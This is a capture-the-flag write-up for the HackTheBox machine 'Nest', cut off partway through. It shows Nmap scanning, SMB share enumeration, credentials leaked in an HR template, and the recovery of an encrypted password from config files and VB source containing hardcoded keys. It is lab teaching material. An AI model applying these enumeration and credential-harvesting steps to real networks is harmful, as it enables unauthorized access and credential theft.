Quick Summary
→ This machine is really awesome because it involves a lot of enumeration, especially on the smbclient side. You need a strong knowledge of Active Directory. It is rated as an easy machine, but others say it is a medium box because there is a debug mode that beginner players have some trouble with. Unlike other machines, on this one I never get a proper shell.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ Discover open ports and what services are running
Enumeration
→ Service enumeration
→ Enumerate SMB shares
→ In this phase there was a lot of SMB enumeration; different files were discovered inside the shares
→ Analyzing the retrieved content, some interesting files: RU_Config.xml and config.xml
Post-Exploitation
→ Analyze how the decryption of the password works
→ Decrypt the password with dotnetfiddle
→ Running the script gives the password for the user
Exploitation
→ Enumerate the C.Smith user
→ Log in as C.Smith with SMB
→ Finally get user.txt
Privilege Escalation
→ I initially came across Debug Mode Password.txt
→ HQK Reporting Service v1.2 running on port 4386
→ Enumerate HQK Reporting Service v1.2 with telnet; this gives a lot of information
→ Get and execute the .exe file, HqkLdap.exe, which gives the Administrator password
→ Finally get the root.txt flag, but with smbclient
Network Scanning
Walkthrough
→ I always begin with Nmap to look at which services are running. I always use:
- -sV ⇒ probe open ports to determine service/version info
- -sC ⇒ equivalent to --script=default
- -A ⇒ aggressive scan (OS detection, version detection, script scanning and traceroute)
- -oN ⇒ save our scan results to a text file

```bash
root in ~/htb/Nest ❯ nmap -sV -sC -A 10.10.10.178 -oN nmap-Nest
Starting Nmap 7.80 ( https:
Nmap scan report for 10.10.10.178
Host is up (0.21s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista:icrosoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 Rndows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 o1%), Microsoft Windows Embedded Standard 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
4386/tcp open  unknown
[snip]
| Help:
|   Reporting Service V1.2
|   This service allows users to run queries against databases using the legacy HQK format
|   --- AVAILABLE COMMANDS ---
|   LIST
|   SETDIR <Directory_Name>
|   RUNQUERY <Query_ID>
|   DEBUG <Password>
|_  HELP <Command>
[snip]

Host script results:
|_clock-skew: 2m26s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-03-22T00:29:42
|_  start_date: 2020-03-21T23:00:50

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   223.12 ms 10.10.14.1
2   223.23 ms 10.10.10.178

OS and Service detection performed. Please report any incorrect results at https:
Nmap done: 1 IP address (1 host up) scanned in 112.08 seconds
root in ~/htb/Nest took 1m52s ❯
```
Nmap results
So there are only 2 ports open:
- 445 ⇒ SMB (microsoft-ds), which we will talk to with smbclient
- 4386 ⇒ unknown to nmap, but the banner in the results shows it is the HQK Reporting Service
Enumeration
Since TCP/445 is open, we can take a look to see what shares are available:

```bash
root in htb/boxes/Nest ❯ smbclient -L \\\\10.10.10.178
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk
        IPC$            IPC       Remote IPC
        Secure$         Disk
        Users           Disk
SMB1 disabled -- no workgroup available
root in htb/boxes/Nest ❯
```
The Data share seems to be accessible anonymously. We can recursively list the contents of the share with smbclient:

```bash
root in htb/boxes/Nest ❯ smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .            D  0  Thu Aug 8 06:53:46 2019
  ..           D  0  Thu Aug 8 06:53:46 2019
  IT           D  0  Thu Aug 8 06:58:07 2019
  Production   D  0  Tue Aug 6 05:53:38 2019
  Reports      D  0  Tue Aug 6 05:53:44 2019
  Shared       D  0  Thu Aug 8 03:07:51 2019

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

\Production
NT_STATUS_ACCESS_DENIED listing \Production\*

\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*

\Shared
  .            D  0  Thu Aug 8 03:07:51 2019
  ..           D  0  Thu Aug 8 03:07:51 2019
  Maintenance  D  0  Thu Aug 8 03:07:32 2019
  Templates    D  0  Thu Aug 8 03:08:07 2019

\Shared\Maintenance
  .                       D   0  Thu Aug 8 03:07:32 2019
  ..                      D   0  Thu Aug 8 03:07:32 2019
  Maintenance Alerts.txt  A  48  Tue Aug 6 07:01:44 2019

\Shared\Templates
  .            D  0  Thu Aug 8 03:08:07 2019
  ..           D  0  Thu Aug 8 03:08:07 2019
  HR           D  0  Thu Aug 8 03:08:01 2019
  Marketing    D  0  Thu Aug 8 03:08:06 2019

\Shared\Templates\HR
  .                  D    0  Thu Aug 8 03:08:01 2019
  ..                 D    0  Thu Aug 8 03:08:01 2019
  Welcome Email.txt  A  425  Thu Aug 8 06:55:36 2019

\Shared\Templates\Marketing
  .            D  0  Thu Aug 8 03:08:06 2019
  ..           D  0  Thu Aug 8 03:08:06 2019

smb: \>
smb: \> cd \Shared\Templates\HR
smb: \Shared\Templates\HR\> ls
  .                  D    0  Thu Aug 8 03:08:01 2019
  ..                 D    0  Thu Aug 8 03:08:01 2019
  Welcome Email.txt  A  425  Thu Aug 8 06:55:36 2019

                10485247 blocks of size 4096. 6543883 blocks available
smb: \Shared\Templates\HR\>
```
To easily list the whole directory tree I used the command recurse on, and as you can see there were potentially interesting files: Maintenance Alerts.txt and Welcome Email.txt. I downloaded them with smbclient:

```bash
smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
Get file Welcome Email.txt? y
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \Shared\Templates\HR\>
```
Then let's read the content of the .txt file:

```bash
root in htb/boxes/Nest ❯ cat 'Welcome Email.txt'
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
HR
root in htb/boxes/Nest ❯
```
Next is Maintenance Alerts.txt:

```bash
Current directory is \Shared\Templates\HR\
smb: \Shared\Templates\HR\> cd /
smb: \> cd \Shared\Maintenance
smb: \Shared\Maintenance\> ls
  .                       D   0  Thu Aug 8 03:07:32 2019
  ..                      D   0  Thu Aug 8 03:07:32 2019
  Maintenance Alerts.txt  A  48  Tue Aug 6 07:01:44 2019

                10485247 blocks of size 4096. 6543883 blocks available
smb: \Shared\Maintenance\> mget "Maintenance Alerts.txt"
Get file Maintenance Alerts.txt? y
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Shared\Maintenance\>
```
Then read the content:

```bash
root in htb/boxes/Nest ❯ cat 'Maintenance Alerts.txt'
There is currently no scheduled maintenance work
root in htb/boxes/Nest ❯
```

Not much of interest, so let's move on to the next phase.
Enumerating SMB Shares
The Welcome Email.txt gives us credentials for TempUser, so I'll try them with smbclient and see whether they give us any further access to the Data share:

```bash
root in htb/boxes/Nest ❯ smbclient \\\\10.10.10.178\\Data -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .            D  0  Thu Aug 8 06:53:46 2019
  ..           D  0  Thu Aug 8 06:53:46 2019
  IT           D  0  Thu Aug 8 06:58:07 2019
  Production   D  0  Tue Aug 6 05:53:38 2019
  Reports      D  0  Tue Aug 6 05:53:44 2019
  Shared       D  0  Thu Aug 8 03:07:51 2019

\IT
  .            D  0  Thu Aug 8 06:58:07 2019
  ..           D  0  Thu Aug 8 06:58:07 2019
  Archive      D  0  Tue Aug 6 06:33:58 2019
  Configs      D  0  Thu Aug 8 06:59:34 2019
  Installs     D  0  Thu Aug 8 06:08:30 2019
  Reports      D  0  Sun Jan 26 08:09:13 2020
  Tools        D  0  Tue Aug 6 06:33:43 2019

\Production
  .            D  0  Tue Aug 6 05:53:38 2019
  ..           D  0  Tue Aug 6 05:53:38 2019

\Reports
  .            D  0  Tue Aug 6 05:53:44 2019
  ..           D  0  Tue Aug 6 05:53:44 2019

\Shared
  .            D  0  Thu Aug 8 03:07:51 2019
  ..           D  0  Thu Aug 8 03:07:51 2019
  Maintenance  D  0  Thu Aug 8 03:07:32 2019
  Templates    D  0  Thu Aug 8 03:08:07 2019

\IT\Archive
  .            D  0  Tue Aug 6 06:33:58 2019
  ..           D  0  Tue Aug 6 06:33:58 2019

\IT\Configs
  .                D  0  Thu Aug 8 06:59:34 2019
  ..               D  0  Thu Aug 8 06:59:34 2019
  Adobe            D  0  Thu Aug 8 03:20:09 2019
  Atlas            D  0  Tue Aug 6 19:16:18 2019
  DLink            D  0  Tue Aug 6 21:25:27 2019
  Microsoft        D  0  Thu Aug 8 03:23:26 2019
  NotepadPlusPlus  D  0  Thu Aug 8 03:31:37 2019
  RU Scanner       D  0  Thu Aug 8 04:01:13 2019
  Server Manager   D  0  Tue Aug 6 21:25:19 2019

\IT\Installs
  .            D  0  Thu Aug 8 06:08:30 2019
  ..           D  0  Thu Aug 8 06:08:30 2019

\IT\Reports
  .            D  0  Sun Jan 26 08:09:13 2020
  ..           D  0  Sun Jan 26 08:09:13 2020

\IT\Tools
  .            D  0  Tue Aug 6 06:33:43 2019
  ..           D  0  Tue Aug 6 06:33:43 2019

\Shared\Maintenance
  .                       D   0  Thu Aug 8 03:07:32 2019
  ..                      D   0  Thu Aug 8 03:07:32 2019
  Maintenance Alerts.txt  A  48  Tue Aug 6 07:01:44 2019

\Shared\Templates
  .            D  0  Thu Aug 8 03:08:07 2019
  ..           D  0  Thu Aug 8 03:08:07 2019
  HR           D  0  Thu Aug 8 03:08:01 2019
  Marketing    D  0  Thu Aug 8 03:08:06 2019

\IT\Configs\Adobe
  .             D      0  Thu Aug 8 03:20:09 2019
  ..            D      0  Thu Aug 8 03:20:09 2019
  editing.xml   AH   246  Sat Aug 3 20:58:42 2019
  Options.txt   A      0  Tue Oct 11 05:11:14 2011
  projects.xml  A    258  Wed Jan 9 00:30:52 2013
  settings.xml  A   1274  Thu Aug 8 03:19:12 2019

\IT\Configs\Atlas
  .             D      0  Tue Aug 6 19:16:18 2019
  ..            D      0  Tue Aug 6 19:16:18 2019
  Temp.XML      A   1369  Wed Jun 11 15:38:22 2003

\IT\Configs\DLink
  .             D      0  Tue Aug 6 21:25:27 2019
  ..            D      0  Tue Aug 6 21:25:27 2019

\IT\Configs\Microsoft
  .             D      0  Thu Aug 8 03:23:26 2019
  ..            D      0  Thu Aug 8 03:23:26 2019
  Options.xml   A   4598  Sun Mar 4 03:24:24 2012

\IT\Configs\NotepadPlusPlus
  .              D      0  Thu Aug 8 03:31:37 2019
  ..             D      0  Thu Aug 8 03:31:37 2019
  config.xml     A   6451  Thu Aug 8 07:01:25 2019
  shortcuts.xml  A   2108  Thu Aug 8 03:30:27 2019

\IT\Configs\RU Scanner
  .              D      0  Thu Aug 8 04:01:13 2019
  ..             D      0  Thu Aug 8 04:01:13 2019
  RU_config.xml  A    270  Fri Aug 9 03:49:37 2019

\IT\Configs\Server Manager
  .              D      0  Tue Aug 6 21:25:19 2019
  ..             D      0  Tue Aug 6 21:25:19 2019

\Shared\Templates\HR
  .                  D    0  Thu Aug 8 03:08:01 2019
  ..                 D    0  Thu Aug 8 03:08:01 2019
  Welcome Email.txt  A  425  Thu Aug 8 06:55:36 2019

\Shared\Templates\Marketing
  .                  D    0  Thu Aug 8 03:08:06 2019
  ..                 D    0  Thu Aug 8 03:08:06 2019

                10485247 blocks of size 4096. 6543883 blocks available
smb: \>
```
Looks like we have access to some files in the IT directory now. I'll just recursively pull down all the files in the share with smbget:

```bash
root in htb/boxes/Nest ❯ smbget -R smb://10.10.10.178/Data/ -U TempUser
Password for [TempUser] connecting to //Data/10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Data//IT/Configs/Adobe/editing.xml
smb://10.10.10.178/Data//IT/Configs/Adobe/Options.txt
smb://10.10.10.178/Data//IT/Configs/Adobe/projects.xml
smb://10.10.10.178/Data//IT/Configs/Adobe/settings.xml
smb://10.10.10.178/Data//IT/Configs/Atlas/Temp.XML
smb://10.10.10.178/Data//IT/Configs/Microsoft/Options.xml
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/config.xml
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/shortcuts.xml
smb://10.10.10.178/Data//IT/Configs/RU Scanner/RU_config.xml
smb://10.10.10.178/Data//Shared/Maintenance/Maintenance Alerts.txt
smb://10.10.10.178/Data//Shared/Templates/HR/Welcome Email.txt
Downloaded 16.65kB in 95 seconds
root in htb/boxes/Nest took 1m34s ❯ ls
IT  'Maintenance Alerts.txt'  nmap-Nest  Production  Reports  Shared  'Welcome Email.txt'
root in htb/boxes/Nest ❯
```
When I went through the files one by one on my own machine I found some interesting stuff: RU_config.xml and config.xml. The first one lives at IT/Configs/RU Scanner/RU_config.xml:

```bash
root in htb/boxes/Nest ❯ cd IT/Configs/
root in Nest/IT/Configs ❯ ls
Adobe  Atlas  DLink  Microsoft  NotepadPlusPlus  'RU Scanner'  'Server Manager'
root in Nest/IT/Configs ❯ cd 'RU Scanner'/
root in IT/Configs/RU Scanner ❯ ls
RU_config.xml
root in IT/Configs/RU Scanner ❯
```

and this is the content of the XML file I got:

```bash
root in IT/Configs/RU Scanner ❯ cat RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
root in IT/Configs/RU Scanner ❯
```
I thought I would use it to try authenticating to the SMB shares, but authentication failed, so I think the password is encrypted rather than stored in the clear, leading me to suspect that it needs to be decrypted before it can be used.
Next is config.xml:

```bash
root in IT/Configs/NotepadPlusPlus ❯ cat config.xml
<?xml version="1.0" encoding="Windows-1252" ?> <NotepadPlus> <GUIConfigs> <!-- 3 status : "large", "small" or "hide"--> <GUIConfig name="ToolBar" visible="yes">standard</GUIConfig> <!-- 2 status : "show" or "hide"--> <GUIConfig name="StatusBar">show</GUIConfig> <!-- For all attributs, 2 status : "yes" or "no"--> <GUIConfig name="TabBar" dragAndDrop="yes" drawTopBar="yes" drawInactiveTab="yes" reduce="yes" closeButton="no" doubleClick2Close="no" vertical="no" multiLine="no" hide="no" /> <!-- 2 positions : "horizontal" or "vertical"--> <GUIConfig name="ScintillaViewsSplitter">vertical</GUIConfig> <!-- For the attribut of position, 2 status : docked or undocked ; 2 status : "show" or "hide" --> <GUIConfig name="UserDefineDlg" position="undocked">hide</GUIConfig> <GUIConfig name="TabSetting" size="4" replaceBySpace="no" /> <!--App position--> <GUIConfig name="AppPosition" x="662" y="95" width="955" height="659" isMaximized="yes" /> <!-- For the primary scintilla view, 2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide" 4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box" --> <GUIConfig name="ScintillaPrimaryView" lineNumberMargin="show" bookMarkMargin="show" folderMarkStyle="box" indentGuideLine="show" currentLineHilitingShow="show" Wrap="yes" edge="no" edgeNbColumn="100" wrapSymbolShow="hide" zoom="0" whiteSpaceShow="hide" eolShow="hide" lineWrapMethod="aligned" zoom2="0" /> <!-- For the secodary scintilla view, 2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide" 4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box" --> <GUIConfig name="Auto-detection">yes</GUIConfig> <GUIConfig name="CheckHistoryFiles">no</GUIConfig> <GUIConfig name="TrayIcon">no</GUIConfig> <GUIConfig name="RememberLastSession">yes</GUIConfig> <!-- New Document default settings : format = 0/1/2 -> win/unix/mac encoding = 0/1/2/3/4/5 -> ANSI/UCS2Big/UCS2small/UTF8/UTF8-BOM defaultLang = 0/1/2/.. Note 1 : UTF8-BOM -> UTF8 without BOM Note 2 : for defaultLang : 0 -> L_TXT 1 -> L_PHP ... (see source file) --> <GUIConfig name="NewDocDefaultSettings" format="0" encoding="0" lang="0" codepage="-1" openAnsiAsUTF8="no" /> <GUIConfig name="langsExcluded" gr0="0" gr1="0" gr2="0" gr3="0" gr4="0" gr5="0" gr6="0" gr7="0" langMenuCompact="yes" /> <!-- printOption is print colour setting, the following values are possible : 0 : WYSIWYG 1 : Invert colour 2 : B & W 3 : WYSIWYG but without background colour --> <GUIConfig name="Print" lineNumber="no" printOption="0" headerLeft="$(FULL_CURRENT_PATH)" headerMiddle="" headerRight="$(LONG_DATE) $(TIME)" headerFontName="IBMPC" headerFontStyle="1" headerFontSize="8" footerLeft="" footerMiddle="-$(CURRENT_PRINTING_PAGE)-" footerRight="" footerFontName="" footerFontStyle="0" footerFontSize="9" margeLeft="0" margeTop="0" margeRight="0" margeBottom="0" /> <!-- Backup Setting : 0 : non backup 1 : simple backup 2 : verbose backup --> <GUIConfig name="Backup" action="0" useCustumDir="no" dir="" /> <GUIConfig name="TaskList">yes</GUIConfig> <GUIConfig name="SaveOpenFileInSameDir">no</GUIConfig> <GUIConfig name="noUpdate" intervalDays="15" nextUpdateDate="20080426">no</GUIConfig> <GUIConfig name="MaitainIndent">yes</GUIConfig> <GUIConfig name="MRU">yes</GUIConfig> <GUIConfig name="URL">0</GUIConfig> <GUIConfig name="globalOverride" fg="no" bg="no" font="no" fontSize="no" bold="no" italic="no" underline="no" /> <GUIConfig name="auto-completion" autoCAction="0" triggerFromNbChar="1" funcParams="no" /> <GUIConfig name="sessionExt"></GUIConfig> <GUIConfig name="SmartHighLight">yes</GUIConfig> <GUIConfig name="TagsMatchHighLight" TagAttrHighLight="yes" HighLightNonHtmlZone="no">yes</GUIConfig> <GUIConfig name="MenuBar">show</GUIConfig> <GUIConfig name="Caret" width="1" blinkRate="250" /> <GUIConfig name="ScintillaGlobalSettings" enableMultiSelection="no" /> <GUIConfig name="openSaveDir" value="0" defaultDirPath="" /> <GUIConfig name="titleBar" short="no" /> <GUIConfig name="DockingManager" leftWidth="200" rightWidth="200" topHeight="200" bottomHeight="266"> <FloatingWindow cont="4" x="39" y="109" width="531" height="364" /> <PluginDlg pluginName="dummy" id="0" curr="3" prev="-1" isVisible="yes" /> <PluginDlg pluginName="NppConverter.dll" id="3" curr="4" prev="0" isVisible="no" /> <ActiveTabs cont="0" activeTab="-1" /> <ActiveTabs cont="1" activeTab="-1" /> <ActiveTabs cont="2" activeTab="-1" /> <ActiveTabs cont="3" activeTab="-1" /> </GUIConfig> </GUIConfigs> <!-- The History of opened files list --> <FindHistory nbMaxFindHistoryPath="10" nbMaxFindHistoryFilter="10" nbMaxFindHistoryFind="10" nbMaxFindHistoryReplace="10" matchWord="no" matchCase="no" wrap="yes" directionDown="yes" fifRecuisive="yes" fifInHiddenFolder="no" dlgAlwaysVisible="no" fifFilterFollowsDoc="no" fifFolderFollowsDoc="no" searchMode="0" transparencyMode="0" transparency="150"> <Find name="text" /> <Find name="txt" /> <Find name="itx" /> <Find name="iTe" /> <Find name="IEND" /> <Find name="redeem" /> <Find name="activa" /> <Find name="activate" /> <Find name="redeem on" /> <Find name="192" /> <Replace name="C_addEvent" /> </FindHistory>
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
  <File filename="C:\windows\System32\drivers\etc\hosts" />
  <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
  <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
</NotepadPlus>
root in IT/Configs/NotepadPlusPlus ❯
```
Looking at the very bottom of config.xml I see something else interesting: the recent-files history shows that someone was accessing files on the Secure$ share as well as files on the C.Smith user's desktop.

```xml
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
  <File filename="C:\windows\System32\drivers\etc\hosts" />
  <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
  <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
```
Post Exploitation
Enumerate TempUser
So let's see if we can access anything in the Secure$ share as TempUser:

```bash
❯ smbclient \\\\10.10.10.178\\Secure$ -U TempUser
smb: \> recurse on
smb: \> ls
  .            D  0  Wed Aug 7 19:08:12 2019
  ..           D  0  Wed Aug 7 19:08:12 2019
  Finance      D  0  Wed Aug 7 15:40:13 2019
  HR           D  0  Wed Aug 7 19:08:11 2019
  IT           D  0  Thu Aug 8 06:59:25 2019

\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*

\HR
NT_STATUS_ACCESS_DENIED listing \HR\*

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \>
```
Interesting; it seems that TempUser cannot list any of the 3 top-level directories, but ultimately I found that the IT\Carl\ folder (the path from the Notepad++ history) was indeed listable:

```bash
root in htb/boxes/Nest ❯ smbclient \\\\10.10.10.178\\Secure$ -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> cd IT/Carl
smb: \IT\Carl\> recurse on
smb: \IT\Carl\> ls
  .            D  0  Thu Aug 8 03:42:14 2019
  ..           D  0  Thu Aug 8 03:42:14 2019
  Docs         D  0  Thu Aug 8 03:44:00 2019
  Reports      D  0  Tue Aug 6 21:45:40 2019
  VB Projects  D  0  Tue Aug 6 22:41:55 2019

\IT\Carl\Docs
  .            D   0  Thu Aug 8 03:44:00 2019
  ..           D   0  Thu Aug 8 03:44:00 2019
  ip.txt       A  56  Thu Aug 8 03:44:16 2019
  mmc.txt      A  73  Thu Aug 8 03:43:42 2019

\IT\Carl\Reports
  .            D  0  Tue Aug 6 21:45:40 2019
  ..           D  0  Tue Aug 6 21:45:40 2019

\IT\Carl\VB Projects
  .            D  0  Tue Aug 6 22:41:55 2019
  ..           D  0  Tue Aug 6 22:41:55 2019
  Production   D  0  Tue Aug 6 22:07:13 2019
  WIP          D  0  Tue Aug 6 22:47:41 2019

\IT\Carl\VB Projects\Production
  .            D  0  Tue Aug 6 22:07:13 2019
  ..           D  0  Tue Aug 6 22:07:13 2019

\IT\Carl\VB Projects\WIP
  .            D  0  Tue Aug 6 22:47:41 2019
  ..           D  0  Tue Aug 6 22:47:41 2019
  RU           D  0  Fri Aug 9 23:36:45 2019

\IT\Carl\VB Projects\WIP\RU
  .              D    0  Fri Aug 9 23:36:45 2019
  ..             D    0  Fri Aug 9 23:36:45 2019
  RUScanner      D    0  Thu Aug 8 06:05:54 2019
  RUScanner.sln  A  871  Tue Aug 6 22:45:36 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner
  .                       D     0  Thu Aug 8 06:05:54 2019
  ..                      D     0  Thu Aug 8 06:05:54 2019
  bin                     D     0  Thu Aug 8 04:00:11 2019
  ConfigFile.vb           A   772  Thu Aug 8 06:05:09 2019
  Module1.vb              A   279  Thu Aug 8 06:05:44 2019
  My Project              D     0  Thu Aug 8 04:00:11 2019
  obj                     D     0  Thu Aug 8 04:00:11 2019
  RU Scanner.vbproj       A  4828  Fri Aug 9 23:37:51 2019
  RU Scanner.vbproj.user  A   143  Tue Aug 6 20:55:27 2019
  SsoIntegration.vb       A   133  Thu Aug 8 06:05:58 2019
  Utils.vb                A  4888  Thu Aug 8 03:49:35 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin
  .            D  0  Thu Aug 8 04:00:11 2019
  ..           D  0  Thu Aug 8 04:00:11 2019
  Debug        D  0  Thu Aug 8 03:59:13 2019
  Release      D  0  Tue Aug 6 20:55:26 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\My Project
  .                        D     0  Thu Aug 8 04:00:11 2019
  ..                       D     0  Thu Aug 8 04:00:11 2019
  Application.Designer.vb  A   441  Tue Aug 6 20:55:13 2019
  Application.myapp        A   481  Tue Aug 6 20:55:13 2019
  AssemblyInfo.vb          A  1163  Tue Aug 6 20:55:13 2019
  Resources.Designer.vb    A  2776  Tue Aug 6 20:55:13 2019
  Resources.resx           A  5612  Tue Aug 6 20:55:13 2019
  Settings.Designer.vb     A  2989  Tue Aug 6 20:55:13 2019
  Settings.settings        A   279  Tue Aug 6 20:55:13 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\obj
  .            D  0  Thu Aug 8 04:00:11 2019
  ..           D  0  Thu Aug 8 04:00:11 2019
  x86          D  0  Thu Aug 8 03:59:18 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Debug
  .            D  0  Thu Aug 8 03:59:13 2019
  ..           D  0  Thu Aug 8 03:59:13 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Release
  .            D  0  Tue Aug 6 20:55:26 2019
  ..           D  0  Tue Aug 6 20:55:26 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\obj\x86
  .            D  0  Thu Aug 8 03:59:18 2019
  ..           D  0  Thu Aug 8 03:59:18 2019

                10485247 blocks of size 4096. 6544137 blocks available
smb: \IT\Carl\>
```
Looks like there is some source code written in Visual Basic, so I use smbget to recursively download the Secure$\IT\Carl directory for further analysis:

```bash
root in htb/boxes/Nest ❯ smbget -rR smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
Password for [TempUser] connecting to //Secure$/10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt
smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Utils.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln
Downloaded 0b in 12 seconds
root in htb/boxes/Nest 12s ❯
```
So this is the whole directory I got:

```bash
root in WIP/RU/RUScanner ❯ ls
bin  ConfigFile.vb  Module1.vb  'My Project'  obj  'RU Scanner.vbproj'  'RU Scanner.vbproj.user'  SsoIntegration.vb  Utils.vb
root in WIP/RU/RUScanner ❯
```
Looking at the .vb files, Module1.vb is responsible for loading RU_config.xml and passing the stored password through the decryption routine:

```vb
' root in WIP/RU/RUScanner ❯ cat Module1.vb
Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
    End Sub

End Module
```
And Utils.vb is responsible for decrypting the password:

```vb
' root in WIP/RU/RUScanner ❯ cat Utils.vb
Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Encrypt(ByVal plainText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
        Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)
